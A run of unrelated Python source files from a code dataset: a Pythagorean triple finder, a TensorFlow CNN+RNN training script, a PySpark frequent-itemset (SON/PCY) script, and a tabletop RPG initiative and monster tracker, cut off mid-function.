\n#DaVinci().Input=[\"Gauss-26166050-100ev-20170208.xgen\"]\n#DaVinci().Input=[\"Lc.xgen\"]\nDaVinci().Input=[name+\".sim\"]\n#DaVinci().Input=[\"B2Kee.sim\"]\n#DaVinci().Input=[\"D0.xgen\"]\n","sub_path":"LHCbGaussSimulation_Option/pgun/ReadSim.py","file_name":"ReadSim.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"124629299","text":"#bu algoritma direk neredeyse tüm doğal sayıları deniyor. kesin daha etkili bir algoritma vardır.\n#x,y,z tarzında üçlü mesela 3 4 5\n#primitive right triangle demek sayılar aralarında asal demek. mesela 6 8 10 ve 3 4 5 aynanda varolmuyor.\nimport math\nimport time\n\nwhile True:\n n=int(input(\"Dik kenarların en büyük değerini giriniz: \"))\n baslama_zamani= time.time()\n liste=[f\"{x} {y} {int(math.sqrt(x**2 + y**2))}\\n\"\n for x in range(2,n) for y in range(x+1,n) \n if math.isclose(math.sqrt(x**2 + y**2),int(math.sqrt(x**2 + y**2))) and math.gcd(x,y)==1]\n\n yeni_liste =\"\".join(liste)\n print(f\"{yeni_liste}\\n{round(time.time() - baslama_zamani,5)} saniyede {len(liste)} ilkel Pisagor üçgeni bulundu.\\n\")\n\n","sub_path":"pisagor_uclusu_bulucu.py","file_name":"pisagor_uclusu_bulucu.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"61091767","text":"# CNN + RNN on 20 images\nimport tensorflow as tf\nimport random\nimport numpy as np\nimport random\n\n# hyper parameters\nlearning_rate = 0.0001\ntraining_epochs = 200\nbatch_size = 100\nfinal_output = 7\ndropout_rate = 0.7 # keep_prob.\n\n# parameters for rnn\ntime_step_size = 20 # which is the number of frames\nlstm_size = 3072\n\ntf.set_random_seed(777) # reproducibility\n\ndata_all = np.loadtxt('image_recognition_data.csv', delimiter=',', dtype=np.float32)\ndata = data_all[:5000]\ndata_test = data_all[5000:]\n\n\ndef next_batch(step):\n if ((step + 1) * batch_size > len(data)):\n data_piece = data[step * batch_size:]\n else:\n data_piece = data[step * batch_size:(step + 1) * batch_size]\n Ys_raw = data_piece[:, [-1]]\n Ys = []\n for i in range(len(Ys_raw)):\n entry = [0] * 7\n for result in range(7):\n if (Ys_raw[i][0] == result):\n entry[result] = 1\n else:\n entry[result] = 0\n Ys.append(entry)\n\n return data_piece[:, :-1], Ys\n\ndef test_set() :\n size = np.shape(data_test)[0]\n temp_test = np.asarray([data_test[random.randint(0,size-1)]])\n for i in range(99) :\n temp_test = np.concatenate((temp_test, [data_test[random.randint(0,size-1)]]), axis = 0)\n Ys_raw = temp_test[:, [-1]]\n Ys = []\n for i in range(len(Ys_raw)):\n entry = [0] * 7\n for result in range(7):\n if (Ys_raw[i][0] == result):\n entry[result] = 1\n else:\n entry[result] = 0\n Ys.append(entry)\n return temp_test[:, :-1], Ys\n 
\n\n\n# < Input Process >\n# X : [batch_size, 20 * 48 * 48 * 1]\n# (processed) --> X_images : [20, batch_size, 48, 48, 1]\n# Y : [batch_size, 7]`\nX = tf.placeholder(tf.float32, [None, 20 * 48 * 48 * 1])\nX_reshaped = tf.reshape(X, [-1, 20, 48, 48, 1]) # img 48*48*1 (gray)\nX_images = []\nfor i in range(20):\n temp = tf.slice(X_reshaped, [0, i, 0, 0, 0], [-1, 1, -1, -1, -1])\n X_images.append(tf.reshape(temp, [-1, 48, 48, 1]))\nY = tf.placeholder(tf.float32, [None, 7])\n\n\n\n# < Convolution + MaxPool 1 : Layer1 >\n# (+) Conv1 : [?, 48, 48, 1] --> [?, 44, 44, 64]\n# (+) MaxPool1 : [?, 44, 44, 64] --> [?, 22, 22, 64]\n# X_images_after_L1 : [20, ?, 22, 22, 64]\n#W1 = tf.get_variable(\"W1\", shape=[5, 5, 1, 64],\n# initializer=tf.contrib.layers.xavier_initializer())\nW1 = tf.Variable(tf.random_normal([5,5,1,64]))\nX_images_after_L1 = [0]*20\nfor i in range(20):\n temp = tf.nn.conv2d(X_images[i], W1, strides=[1, 1, 1, 1], padding='VALID')\n temp = tf.nn.relu(temp)\n temp = tf.nn.max_pool(temp, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME')\n temp = tf.nn.dropout(temp, dropout_rate)\n X_images_after_L1[i] = temp\n\n\n\n# < Convolution + MaxPool 2 : Layer2 >\n# (+) Conv2 : [?, 22, 22, 64] --> [?, 18, 18, 64]\n# (+) MaxPool2 : [?, 18, 18, 64] --> [?, 9, 9, 64]\n# X_images_after_L2 : [20, ?, 9, 9, 64]\n#W2 = tf.get_variable(\"W2\", shape=[5, 5, 64, 64],\n# initializer=tf.contrib.layers.xavier_initializer())\nW2 = tf.Variable(tf.random_normal([5,5,64,64]))\nX_images_after_L2 = [0]*20\nfor i in range(20):\n temp = tf.nn.conv2d(X_images_after_L1[i], W2, strides=[1, 1, 1, 1], padding='VALID')\n temp = tf.nn.relu(temp)\n temp = tf.nn.max_pool(temp, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME')\n temp = tf.nn.dropout(temp, dropout_rate)\n X_images_after_L2[i] = temp\n\n\n\n# < Convolution (No MaxPool) : Layer3 >\n# (+) Conv3 : [?, 9, 9, 64] --> [?, 6, 6, 128]\n# X_images_after_L3 : [20, ?, 6 * 6 * 64] (flattened for layer4 (which is fully connected layer)\n#W3 = tf.get_variable(\"W3\", shape=[4, 4, 64, 128],\n# initializer=tf.contrib.layers.xavier_initializer())\nW3 = tf.Variable(tf.random_normal([4,4,64,128]))\nX_images_after_L3 = [0]*20\nfor i in range(20):\n temp = tf.nn.conv2d(X_images_after_L2[i], W3, strides=[1, 1, 1, 1], padding='VALID')\n temp = tf.nn.relu(temp)\n temp = tf.nn.dropout(temp, dropout_rate)\n temp = tf.reshape(temp, [-1, 6 * 6 * 128])\n X_images_after_L3[i] = temp\n\n\n\n# < Fully Connected to 3072 nodes : Layer4 >\n# X_images_after_L4 : [?, 20, 3072]\n#W4 = tf.get_variable(\"W4\", shape=[6 * 6 * 128, 3072],\n# initializer=tf.contrib.layers.xavier_initializer())\nW4 = tf.Variable(tf.random_normal([6*6*128, 3072]))\n#b4 = tf.get_variable(\"b4\", shape=[3072],\n# initializer=tf.contrib.layers.xavier_initializer())\nb4 = tf.Variable(tf.random_normal([3072]))\nX_images_after_L4 = tf.reshape(tf.matmul(X_images_after_L3[0], W4) + b4, [-1, 1, 3072])\nfor i in range(1, 20, 1):\n temp = tf.reshape(tf.matmul(X_images_after_L3[i], W4) + b4, [-1, 1, 3072])\n temp = tf.nn.dropout(temp, dropout_rate)\n X_images_after_L4 = tf.concat([X_images_after_L4, temp], 1)\n \n\n\n# < RNN on features-extracted images : Layer5 >\n# logits : [?, 3072]\n\n#W5 = tf.get_variable(\"W5\", shape=[20*3072, 7],\n# initializer=tf.contrib.layers.xavier_initializer())\nW5 = tf.Variable(tf.random_normal([20*3072, 7]))\n#b5 = tf.get_variable(\"b5\", shape=[7],\n# initializer=tf.contrib.layers.xavier_initializer())\n # X, input shape: (?, 20, 3072)\nb5 = tf.Variable(tf.random_normal([7]))\nXT = 
tf.transpose(X_images_after_L4, [1, 0, 2]) # permute time_step_size and batch_size\n # XT shape: (20, ?, 3072)\nXR = tf.reshape(XT, [-1, lstm_size]) # each row has input for each lstm cell (lstm_size=input_vec_size)\n # XR shape: (time_step_size * batch_size, input_vec_size)\nX_split = tf.split(XR, time_step_size, 0)\n # Each array shape: (?, 3072)\n # Make lstm with lstm_size\n\n\nlstm = tf.contrib.rnn.BasicLSTMCell(lstm_size, forget_bias=1.0, state_is_tuple=True)\n # Get lstm cell output, 20 arrays with lstm_size output: (?, 3072)\noutputs, _states = tf.nn.static_rnn(lstm, X_split, dtype=tf.float32)\n # Linear activation\n # Get the last output\n\noutputs_reshaped = tf.reshape(outputs[0], [-1, 1, 3072])\nfor i in range(1,20,1) :\n outputs_reshaped = tf.concat([outputs_reshaped, tf.reshape(outputs[i], [-1, 1, 3072])], 1)\n\noutputs_reshaped = tf.nn.dropout(outputs_reshaped, dropout_rate)\n\nlogits, _state = tf.matmul(tf.reshape(outputs_reshaped, [-1, 20*3072]), W5) + b5, lstm.state_size # State size to initialize the stat\n\n# hypothesis used for later measurement of accuracy\nhypothesis = tf.nn.softmax(logits)\n\n\n# define cost/loss & optimizer\nprint(\"logits : \", logits)\nprint(\"Y : \", Y)\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\n logits=logits, labels=Y))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\n\nsaver = tf.train.Saver()\n\n\n# initialize\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\n\n# train my model\nprint('Learning started. It takes sometime.')\n\nfor epoch in range(training_epochs):\n avg_cost = 0\n total_batch = (int)(np.ceil(float(len(data)) / batch_size))\n\n for step in range(total_batch):\n feed_X, feed_Y = next_batch(step)\n feed_dict = {X: feed_X, Y: feed_Y}\n c, _ = sess.run([cost, optimizer], feed_dict=feed_dict)\n avg_cost += c / total_batch\n\n feed_X_test, feed_Y_test = test_set()\n acc = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(hypothesis, 1), tf.argmax(Y, 1)), tf.float32))\n \n a = sess.run(acc, feed_dict = {X: feed_X_test, Y: feed_Y_test})\n\n print('Epoch:', '%04d' % (epoch + 1), 'cost =', '{:.9f}'.format(avg_cost))\n print('Accuracy: ', a)\n\nsave_path = saver.save(sess, \"./version_5.ckpt\")\n\nprint('Learning Finished!')\n","sub_path":"Train_CNN+RNN_V6.py","file_name":"Train_CNN+RNN_V6.py","file_ext":"py","file_size_in_byte":7525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"648859013","text":"__author__ = 'Aaron Yang'\n__email__ = 'byang971@usc.edu'\n__date__ = '2/10/2020 10:05 PM'\n\nimport collections\nimport copy\nimport math\nimport sys\nimport time\nfrom functools import reduce\nfrom itertools import combinations\nfrom operator import add\n\nfrom pyspark import SparkContext\n\n# TODO change the number of bucket will have different result\nBUCKET_NUMBER = 99\n\n\ndef hash_func(combination):\n result = sum(map(lambda x: int(x), list(combination)))\n return result % BUCKET_NUMBER\n\n\ndef check_proper_subset(combination, candidate_list):\n \"\"\"\n check if this combination's proper subset in candidate_list\n :param combination: assume its shape is n\n :param candidate_list: then item's shape in this list need to be n - 1\n :return: True of False\n \"\"\"\n length = len(combination)\n for item in combinations(combination, length - 1):\n if len(item) == 1: item = item[0]\n if item not in candidate_list:\n return False\n return True\n\n\ndef check_bitmap(combination, bitmap):\n \"\"\"\n check if its hash result 
in bitmap\n :param combination:\n :param bitmap:\n :return:\n \"\"\"\n return bitmap[hash_func(combination)]\n\n\ndef wrapper(singleton_list):\n \"\"\"\n reformat str item into tuple\n :param singleton_list:\n :return:\n \"\"\"\n return [tuple(item.split(\",\")) for item in singleton_list]\n\n\ndef shrink_basket(basket, frequent_singleton):\n \"\"\"\n we dont need to compute basket_item which is not frequent_single,\n basically we can return the interaction about this two set\n :param basket:\n :param frequent_singleton:\n :return:\n \"\"\"\n return sorted(list(set(basket).intersection(set(frequent_singleton))))\n\n\ndef find_candidate_itemset(data_baskets, original_support, whole_length):\n \"\"\"\n using PCY to find frequent itemset from subset basket\n :param data_baskets: subset baskets\n :param original_support:\n :param whole_length:\n :return: all candidate itemsets list\n \"\"\"\n\n # compute support threshold in subset baskets\n support, data_baskets = gen_ps_threshold(data_baskets, original_support, whole_length)\n baskets_list = list(data_baskets)\n # print(\"baskets_list -> \", baskets_list)\n all_candidate_dict = collections.defaultdict(list)\n # first phrase of PCY algorithm, acquiring frequent_singleton and bitmap\n frequent_singleton, bitmap = init_singleton_and_bitmap(baskets_list, support)\n index = 1\n candidate_list = frequent_singleton\n all_candidate_dict[str(index)] = wrapper(frequent_singleton)\n\n # the second phrase, third phrase .... until the candidate list is empty\n while None is not candidate_list and len(candidate_list) > 0:\n index += 1\n temp_counter = collections.defaultdict(list)\n temp_bitmap = [0 for _ in range(BUCKET_NUMBER)]\n for basket in baskets_list:\n # we dont need to compute basket_item which is not frequent_single\n basket = shrink_basket(basket, frequent_singleton)\n if len(basket) >= index:\n for pair in combinations(basket, index):\n if check_bitmap(pair, bitmap) and \\\n check_proper_subset(pair, candidate_list):\n temp_counter[pair].append(1)\n\n for triplet in combinations(basket, index + 1):\n key = hash_func(triplet)\n temp_bitmap[key] = (temp_bitmap[key] + 1)\n\n # filter the temp_counter\n filtered_dict = dict(filter(lambda elem: len(elem[1]) >= support, temp_counter.items()))\n print(\"index ->\", index)\n print(\"filtered_dict -> \", filtered_dict)\n # generate new candidate list\n candidate_list = sorted(list(filtered_dict.keys()))\n if len(candidate_list) == 0:\n break\n all_candidate_dict[str(index)] = candidate_list\n # generate new bitmap\n bitmap = list(map(lambda value: True if value >= support else False, temp_bitmap))\n\n # convert 2d-array into 1d array\n yield reduce(lambda val1, val2: val1 + val2, all_candidate_dict.values())\n\n\ndef init_singleton_and_bitmap(baskets, support):\n \"\"\"\n first phrase of PCY algorithm\n :param baskets:\n :param support:\n :return: frequent_singleton: a list of sorted frequent singleton => ['100', '101', '102'...\n bitmap: a boolean list => [True, False, True ...\n \"\"\"\n bitmap = [0 for _ in range(BUCKET_NUMBER)]\n temp_counter = collections.defaultdict(list)\n for basket in baskets:\n # find frequent singleton\n for item in basket:\n temp_counter[item].append(1)\n\n # find frequent bucket\n for pair in combinations(basket, 2):\n key = hash_func(pair)\n bitmap[key] = (bitmap[key] + 1)\n\n filtered_dict = dict(filter(lambda elem: len(elem[1]) >= support, temp_counter.items()))\n frequent_singleton = sorted(list(filtered_dict.keys()))\n bitmap = list(map(lambda value: True if value >= 
support else False, bitmap))\n\n return frequent_singleton, bitmap\n\n\ndef count_frequent_itemset(data_baskets, candidate_pairs):\n \"\"\"\n count how many time each candidate item occurred in the sub baskets\n :param data_baskets: sub baskets\n :param candidate_pairs: all candidate pairs\n :return: C, v\n \"\"\"\n baskets_list = list(data_baskets)\n temp_counter = collections.defaultdict(list)\n\n for basket in baskets_list:\n max_length = len(basket)\n for index in range(1, max_length + 1):\n for pairs in combinations(basket, index):\n if pairs in set(candidate_pairs):\n temp_counter[pairs].append(1)\n\n yield [tuple((key, sum(value))) for key, value in temp_counter.items()]\n\n\ndef gen_ps_threshold(partition, support, whole_length):\n \"\"\"\n generate each partition's support threshold\n :param partition:\n :param support:\n :param whole_length: the original rdd's size\n :return: support threshold in this partition\n \"\"\"\n partition = copy.deepcopy(list(partition))\n return math.ceil(support * len(list(partition)) / whole_length), partition\n\n\ndef reformat(itemset_data):\n \"\"\"\n reformat pairs which length is 1 ('100',), -> ('100'),\n and a line break after each subset who has a same length\n :param itemset_data: a list of paris (singletons, pairs, triples, etc.)\n :return: a formatted str\n \"\"\"\n temp_index = 1\n result_str = \"\"\n for pair in itemset_data:\n if len(pair) == 1:\n result_str += str(\"(\" + str(pair)[1:-2] + \"),\")\n\n elif len(pair) != temp_index:\n result_str = result_str[:-1]\n result_str += \"\\n\\n\"\n temp_index = len(pair)\n result_str += (str(pair) + \",\")\n else:\n result_str += (str(pair) + \",\")\n\n return result_str[:-1]\n\n\ndef export_2_file(candidate_data, frequent_data, file_path):\n with open(file_path, 'w+') as output_file:\n str_result = 'Candidates:\\n' + reformat(candidate_data) + '\\n\\n' \\\n + 'Frequent Itemsets:\\n' + reformat(frequent_data)\n output_file.write(str_result)\n output_file.close()\n\n\nif __name__ == '__main__':\n start = time.time()\n case_number = \"2\" # 1 for Case 1 and 2 for Case 2\n support_threshold = \"9\"\n input_csv_path = \"../data/small2.csv\"\n output_file_path = \"../out/output6.txt\"\n\n # case_number = sys.argv[1] # 1 for Case 1 and 2 for Case 2\n # support_threshold = sys.argv[2]\n # input_csv_path = sys.argv[3]\n # output_file_path = sys.argv[4]\n partition_number = 2\n\n sc = SparkContext.getOrCreate()\n\n raw_rdd = sc.textFile(input_csv_path, partition_number)\n # skip the first row => csv header\n header = raw_rdd.first()\n data_rdd = raw_rdd.filter(lambda line: line != header)\n whole_data_size = None\n basket_rdd = None\n\n if 1 == int(case_number):\n # frequent businesses market-basket model\n basket_rdd = data_rdd.map(lambda line: (line.split(',')[0], line.split(',')[1])) \\\n .groupByKey().map(lambda user_items: (user_items[0], sorted(list(set(list(user_items[1])))))) \\\n .map(lambda item_users: item_users[1])\n\n elif 2 == int(case_number):\n # frequent user market-basket model\n basket_rdd = data_rdd.map(lambda line: (line.split(',')[1], line.split(',')[0])) \\\n .groupByKey().map(lambda item_users: (item_users[0], sorted(list(set(list(item_users[1])))))) \\\n .map(lambda item_users: item_users[1])\n\n # implement SON Algorithm\n # phrase 1 subset of data -> (F,1) -> distinct -> sort\n whole_data_size = basket_rdd.count()\n\n candidate_itemset = basket_rdd.mapPartitions(\n lambda partition: find_candidate_itemset(\n data_baskets=partition, original_support=int(support_threshold), 
whole_length=whole_data_size)) \\\n .flatMap(lambda pairs: pairs).distinct() \\\n .sortBy(lambda pairs: (len(pairs), pairs)).collect()\n\n print(candidate_itemset)\n # phrase 2 subset of data + candidate_pairs -> (C, v) -> reduceByKey(add) -> filter\n frequent_itemset = basket_rdd.mapPartitions(\n lambda partition: count_frequent_itemset(data_baskets=partition,\n candidate_pairs=candidate_itemset)) \\\n .flatMap(lambda pairs: pairs).reduceByKey(add) \\\n .filter(lambda pair_count: pair_count[1] >= int(support_threshold)) \\\n .map(lambda pair_count: pair_count[0]) \\\n .sortBy(lambda pairs: (len(pairs), pairs)).collect()\n\n print(frequent_itemset)\n export_2_file(candidate_data=candidate_itemset,\n frequent_data=frequent_itemset,\n file_path=output_file_path)\n\n print(\"Duration: %d s.\" % (time.time() - start))\n","sub_path":"ay_hw_2/python/task1_bk.py","file_name":"task1_bk.py","file_ext":"py","file_size_in_byte":9759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"10421892","text":"from random import randint\r\nfrom os import path\r\nfrom operator import itemgetter\r\nfrom functions import input_num, input_str, XdY_Z_roller, input_question\r\nfrom pickle import dump, load\r\nfrom fractions import Fraction\r\ndir_path = path.dirname(path.realpath(__file__))\r\n\r\n#Made by badooga. Requires functions.py found at https://github.com/badooga/Python-Files\r\n\r\ndef save(mod_dict, monster_dict):\r\n with open(dir_path + \"\\\\dm_data.p\", \"wb\") as f:\r\n data = [mod_dict, monster_dict]\r\n dump(data, f)\r\n\r\ntry:\r\n with open(dir_path + \"\\\\dm_data.p\", \"rb\") as f:\r\n data = load(f)\r\n modifiers = data[0]\r\n monsters = data[1]\r\n\r\nexcept:\r\n print(\"Data file not found. Commencing setup.\")\r\n num_players = input_num(\"How many players does your party have? \", int, 1)\r\n modifiers = {}\r\n monsters = {}\r\n for player in range(num_players):\r\n player_name = input_str(\"Player {} Name: \".format(player + 1), True).rstrip()\r\n player_mod = input_num(\"Player {} Initiative Modifier: \".format(player + 1), int)\r\n modifiers[player_name] = player_mod\r\n save(modifiers, monsters)\r\n\r\ndef entercombat(mod_dict):\r\n global monsters\r\n initiative = {}\r\n num_enemygroups = input_num(\"\\nHow many non-player factions, enemy groups, or individual NPCs are present in combat? \", int, 0)\r\n if num_enemygroups != 0:\r\n for enemygroup in range(num_enemygroups):\r\n enemygroup_name = input_str(\"Faction/Enemy/NPC {} Name: \".format(enemygroup + 1), True).rstrip()\r\n if enemygroup_name in monsters.keys():\r\n enemygroup_mod = monsters[enemygroup_name][\"Initiative Modifier\"]\r\n print(enemygroup_name + \" loaded from Monster Helper.\")\r\n else:\r\n enemygroup_mod = input_num(\"Faction/Enemy/NPC {} Initiative Modifier: \".format(enemygroup + 1), int)\r\n initiative[enemygroup_name] = randint(1,20) + enemygroup_mod\r\n\r\n if mod_dict != {}:\r\n for player in mod_dict.keys():\r\n initiative[player] = randint(1, 20) + mod_dict[player]\r\n \r\n tracker = sorted([(k,v) for k,v in initiative.items()], key=itemgetter(1), reverse=True)\r\n print(\"\\nInitiative Order:\")\r\n for pair in tracker:\r\n print(\"{}: {}\".format(pair[0], pair[1]))\r\n \r\n\r\ndef editplayer(mod_dict):\r\n while True:\r\n if mod_dict == {}:\r\n print(\"\\nYou have no players saved.\")\r\n break\r\n \r\n ecommand = input_num(\"\\nWould you like to edit a player's initiative modifier (1) or a player's name (2)? 
(enter 0 to cancel): \", int)\r\n if ecommand == 0:\r\n break\r\n\r\n elif ecommand == 1:\r\n while True:\r\n player_mod_edit = input_str(\"What player's modifier would you like to edit (enter 0 to cancel)? \", True).rstrip()\r\n if player_mod_edit == \"0\":\r\n break\r\n elif player_mod_edit not in mod_dict.keys():\r\n print(\"Invalid player. Please try again.\")\r\n else:\r\n player_mod_new = input_num(\"New Initiative Modifier: \", int)\r\n mod_dict[player_mod_edit] = player_mod_new\r\n print(\"\\nEdit saved!\")\r\n break\r\n break\r\n \r\n elif ecommand == 2:\r\n while True:\r\n player_name_edit = input_str(\"What player's name would you like to edit (enter 0 to cancel)? \", True).rstrip()\r\n if player_name_edit == \"0\":\r\n break\r\n elif player_name_edit not in mod_dict.keys():\r\n print(\"Invalid player. Please try again.\")\r\n else:\r\n while True:\r\n player_name_new = input_str(\"New Player Name: \", True).rstrip()\r\n if player_name_new in mod_dict.keys():\r\n print(\"Name already taken. Please try again.\")\r\n else:\r\n break\r\n mod_dict[player_name_new] = mod_dict[player_name_edit]\r\n del mod_dict[player_name_edit]\r\n print(\"\\nEdit saved!\")\r\n break\r\n break\r\n\r\n else:\r\n print(\"Invalid command. Please try again.\")\r\n\r\ndef addordeleteplayer(mod_dict):\r\n command = input_num(\"\\nWould you like to add a player or players (1), or would you like to delete a player (2) (enter 0 to cancel)? \", int)\r\n while True:\r\n if command == 0:\r\n break\r\n\r\n elif command == 1:\r\n num_players_add = input_num(\"How many players would you like to add (enter 0 to cancel)? \", int, 0)\r\n if num_players_add == 0:\r\n pass\r\n else:\r\n for player in range(num_players_add):\r\n while True:\r\n player_name_add = input_str(\"Player {} Name: \".format(player + 1), True).rstrip()\r\n if player_name_add in mod_dict.keys():\r\n print(\"Player already exists.\")\r\n elif player_name_add == \"\":\r\n print(\"Invalid name. Please try again.\")\r\n else:\r\n break\r\n player_mod_add = input_num(\"Player {} Initiative Modifier: \".format(player + 1), int)\r\n mod_dict[player_name_add] = player_mod_add\r\n if num_players_add == 1:\r\n print(\"\\nPlayer saved!\")\r\n elif num_players_add > 1:\r\n print(\"\\Players saved!\")\r\n break\r\n\r\n elif command == 2:\r\n while True:\r\n if mod_dict == {}:\r\n print(\"\\nYou have no players saved.\")\r\n break\r\n\r\n player_del = input_str(\"What player would you like to delete (enter 0 to cancel)? \", True)\r\n if player_del == \"0\":\r\n break\r\n elif player_del not in mod_dict.keys():\r\n print(\"Invalid player. Please try again.\")\r\n else: \r\n if input_question(\"Are you sure you want to delete {} from the list of players (Y/N)? \".format(player_del), [\"y\", \"n\"]) == \"y\":\r\n del mod_dict[player_del]\r\n print(\"\\nPlayer successfully deleted.\")\r\n break\r\n break\r\n\r\n else:\r\n print(\"Invalid command. 
Please try again.\")\r\n\r\ndef initiative_roller():\r\n while True:\r\n ccommand = input_num(\"\\nInitiative Commands: Enter Combat (1), Print Player Modifiers (2), Edit Player (3), Add or Delete Players (4)\\nCommand (enter 0 to cancel): \", int)\r\n if ccommand == 0:\r\n break\r\n elif ccommand == 1:\r\n entercombat(modifiers)\r\n break\r\n elif ccommand == 2:\r\n if modifiers == {}:\r\n print(\"\\nYou have no players saved.\")\r\n else:\r\n print(\"\")\r\n print(modifiers)\r\n break\r\n elif ccommand == 3:\r\n editplayer(modifiers)\r\n if modifiers != {}:\r\n save(modifiers, monsters)\r\n elif ccommand == 4:\r\n addordeleteplayer(modifiers)\r\n if modifiers != {}:\r\n save(modifiers, monsters)\r\n else:\r\n print(\"Invalid command. Please try again.\")\r\n\r\ndef addordeletemonster():\r\n global monsters\r\n while True:\r\n add_or_delete = input_num(\"Would you like to add a monster (1), or would you like to delete a monster (2) (enter 0 to cancel)? \", int)\r\n if add_or_delete == 0:\r\n break\r\n elif add_or_delete == 1:\r\n while True:\r\n monster_name = input_str(\"Monster name: \", True)\r\n if monster_name in monsters.keys():\r\n print(\"Monster already exists. Please try again.\")\r\n else:\r\n monsters[monster_name] = {}\r\n m = monsters[monster_name]\r\n break\r\n\r\n m[\"Challenge Rating\"] = Fraction(input_num(\"Challenge Rating: \"))\r\n m[\"Hit Points\"] = input_num(\"Hit Points: \", int)\r\n m[\"Armor Class\"] = input_num(\"Armor Class: \", int)\r\n m[\"Initiative Modifier\"] = input_num(\"Initiative Modifier: \", int)\r\n m[\"Stats\"] = input_str(\"Stats (ability scores, saves, modifiers, etc) that you find important: \", True)\r\n m[\"Features\"] = input_str(\"Features (resistances, passive abilities, speed, etc), that you find important: \", True)\r\n m[\"Description\"] = input_str(\"Description (tactics, lore, behavior, etc) that you find important: \", True)\r\n if input_question(\"Does this monster have Multiattack (Y/N)? \", [\"y\", \"n\"]) == \"y\":\r\n m[\"Multiattack\"] = input_str(\"Multiattack description: \", True)\r\n else:\r\n m[\"Multiattack\"] = False\r\n num_actions = input_num(\"How many available actions (including attacks) does your monster have? \", int, 1)\r\n m[\"Actions\"] = {}\r\n for a in range(num_actions):\r\n while True:\r\n action_name = input_str(\"Action {} Name: \".format(a + 1), True)\r\n if action_name in m[\"Actions\"]:\r\n print(\"Action already exists. Please try again.\")\r\n else:\r\n break\r\n action_desc = input_str(\"Action {} Description: \".format(a + 1), True)\r\n m[\"Actions\"][action_name] = action_desc\r\n print(\"\\nMonster saved!\")\r\n\r\n elif add_or_delete == 2:\r\n while True:\r\n if monsters == {}:\r\n print(\"\\nYou have no monsters saved.\")\r\n break\r\n monster_del = input_str(\"What monster would you like to delete (enter 0 to cancel)? \", True)\r\n if monster_del == \"0\":\r\n break\r\n elif monster_del not in monsters.keys():\r\n print(\"Invalid monster. Please try again.\")\r\n else: \r\n if input_question(\"Are you sure you want to delete {} from the list of monsters (Y/N)? \".format(monster_del), [\"y\", \"n\"]) == \"y\":\r\n del monsters[monster_del]\r\n print(\"\\nMonster successfully deleted.\")\r\n break\r\n else:\r\n print(\"Invalid command. 
Please try again.\")\r\n continue\r\n break\r\n\r\n\r\ndef editmonster():\r\n global monsters\r\n while True:\r\n if monsters == {}:\r\n print(\"\\nYou have no monsters saved.\")\r\n break\r\n monster = input_str(\"Monster to edit (enter 0 to cancel): \", True)\r\n if monster == \"0\":\r\n break\r\n elif monster not in monsters.keys():\r\n print(\"Invalid monster. Please try again.\")\r\n else:\r\n e_m_v = {\r\n \"Stats\": \"Features (resistances, passive abilities, speed, etc), that you find important: \",\r\n \"Challenge Rating\": \"Challenge Rating: \",\r\n \"Features\": \"Features (resistances, passive abilities, speed, etc), that you find important: \",\r\n \"Description\": \"Description (tactics, lore, behavior, etc) that you find important: \",\r\n \"CR\": \"Challenge Rating: \",\r\n }\r\n \r\n m = monsters[monster]\r\n print_monsters(2, monster)\r\n print(\"\")\r\n while True:\r\n m_edit = input_str(\"What value would you like to edit (enter 0 to cancel)? \", True)\r\n m_e = m_edit.lower().title()\r\n if m_e == \"0\":\r\n break\r\n\r\n abbreviations = {\r\n \"Cr\": \"Challenge Rating\",\r\n \"Hp\": \"Hit Points\",\r\n \"Health\": \"Hit Points\",\r\n \"Ac\": \"Armor Class\",\r\n \"Initiative Mod\": \"Initiative Modifier\",\r\n \"Init Mod\": \"Initiative Modifier\",\r\n \"Initiative\": \"Initiative Modifier\",\r\n \"Init\": \"Initiative Modifier\",\r\n \"Initiative Bonus\": \"Initiative Modifier\",\r\n \"Init Bonus\": \"Initiative Modifier\",\r\n \"Bonus To Initiative\": \"Initiative Modifier\",\r\n \"Plus To Initiative\": \"Initiative Modifier\",\r\n }\r\n if m_e in abbreviations.keys():\r\n m_e = abbreviations[m_e]\r\n\r\n if m_e in [x.lower().title() for x in m[\"Actions\"].keys()]:\r\n while True:\r\n new_action_desc = input_str(\"New {} Description: \".format(m_e), True)\r\n if new_action_desc == m[\"Actions\"][m_e]:\r\n print(\"New description matches old description. Please try again.\")\r\n else:\r\n m[\"Actions\"][m_e] = new_action_desc\r\n monsters[monster] = m\r\n print(\"\\nEdit saved!\")\r\n break\r\n break\r\n\r\n elif m_e == \"Name\":\r\n while True:\r\n m_name = input_str(\"New Monster Name: \", True)\r\n if m_name == monster:\r\n print(\"New name matches old name. Please try again.\")\r\n else:\r\n v = monsters.pop(monster)\r\n monsters[m_name] = v\r\n print(\"\\nEdit saved!\")\r\n break\r\n break \r\n\r\n elif m_e in [y.lower().title() for y in m.keys()] and m_e != \"Actions\":\r\n if m_e == \"Challenge Rating\":\r\n m[m_e] = Fraction(input_num(\"Challenge Rating: \"))\r\n elif m_e in [\"Hit Points\", \"Armor Class\", \"Initiative Modifier\"]:\r\n m[m_e] = input_num(m_e + \": \", int)\r\n else:\r\n m[m_e] = input_str(e_m_v[m_e], True)\r\n monsters[monster] = m\r\n print(\"\\nEdit saved!\")\r\n break\r\n \r\n else:\r\n print(\"Invalid data value. Please try again.\")\r\n break\r\n\r\ndef print_monsters(list_or_stat, jumptoprint=False):\r\n global monsters\r\n if monsters == {}:\r\n print(\"\\nYou have no monsters saved.\")\r\n\r\n elif list_or_stat == 1:\r\n while True:\r\n monster_key = input_num(\"Would you like to sort your monsters by CR (1) or by name (2)? \")\r\n if monster_key not in [1,2]:\r\n print(\"Invalid command. 
